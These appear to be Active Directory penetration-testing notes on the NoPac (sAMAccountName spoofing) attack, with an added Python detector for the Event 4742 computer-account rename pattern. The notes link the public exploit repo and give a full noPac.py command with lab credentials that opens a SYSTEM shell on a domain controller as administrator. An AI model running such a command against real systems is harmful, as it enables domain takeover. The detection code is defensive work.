More advanced attacks

NoPac (SamAccountName Spoofing)

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/sam-name-impersonation/ba-p/3042699

Also known as Sam_The_Admin vulnerability.

Involved CVEs:

CVE-2021-42278
CVE-2021-42287

CVE-2021-42278 is a bypass vulnerability in the Security Account Manager (SAM) that lets a computer account's sAMAccountName be set without the trailing `$`. CVE-2021-42287 is a vulnerability in how the Kerberos Privilege Attribute Certificate (PAC) is handled in AD DS.

Exploit repo:

https://github.com/Ridter/noPac.git

Allows running anything as SYSTEM on a DC, for example.

To get a shell (noisy and possibly blocked by AV):

python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
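
Because the attack hinges on renaming a machine account to a DC's name without the trailing `$`, the corresponding detection is a check for computer-account changes that drop the `$`. The block below is an added example, not part of these notes or the noPac project; it parses constructed Event ID 4742 (computer account changed) records in an assumed key=value layout, where TargetUserName is the old name and SamAccountName the new one, and flags the rename pattern.

```python
import re
from typing import Dict, List

# Constructed sample events (not real log output), flattened to key=value.
# Assumed layout: TargetUserName = account before change, SamAccountName = new name.
SAMPLE_EVENTS = [
    # benign: workstation rename keeps the trailing '$'
    "EventID=4742 SubjectUserName=jsmith TargetUserName=WS01$ SamAccountName=WS01-NEW$",
    # suspicious: '$' dropped and new name equals a domain controller hostname
    "EventID=4742 SubjectUserName=forend TargetUserName=ATTACKER-PC$ SamAccountName=ACADEMY-EA-DC01",
    # suspicious: '$' dropped, new name is not a DC but is abnormal for a computer object
    "EventID=4742 SubjectUserName=forend TargetUserName=NEWPC$ SamAccountName=svc-backup",
    # 4742 with no sAMAccountName change ('-' marks an unchanged attribute)
    "EventID=4742 SubjectUserName=jsmith TargetUserName=WS02$ SamAccountName=-",
    # unrelated logon event
    "EventID=4624 SubjectUserName=forend TargetUserName=forend",
]

# DC hostnames; in practice pulled from AD (e.g. the Domain Controllers OU), here constructed.
DC_HOSTNAMES = {"ACADEMY-EA-DC01"}

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict."""
    return dict(FIELD_RE.findall(line))

def classify(event: Dict[str, str]) -> str:
    """Return 'none', 'dollar_removed' or 'dc_spoof' for a single parsed event."""
    if event.get("EventID") != "4742":
        return "none"
    old = event.get("TargetUserName", "")
    new = event.get("SamAccountName", "")
    if new in ("", "-") or new == old:
        return "none"                      # no sAMAccountName change
    if old.endswith("$") and not new.endswith("$"):
        # a computer account lost its '$'; matching a DC name is the NoPac pattern
        return "dc_spoof" if new.upper() in DC_HOSTNAMES else "dollar_removed"
    return "none"

def find_suspicious(lines: List[str]) -> List[Dict[str, str]]:
    """Scan event lines and return findings with verdict, actor, old and new names."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict != "none":
            findings.append({"verdict": verdict, "actor": ev.get("SubjectUserName", "?"),
                             "old": ev["TargetUserName"], "new": ev["SamAccountName"]})
    return findings

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"{f['verdict']}: {f['actor']} renamed {f['old']} -> {f['new']}")
```

The same rule applied to a periodic LDAP query for computer objects whose sAMAccountName lacks a trailing `$` catches renames that were never logged.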

PrintNightmare

This exploits a vulnerability in the print spooler.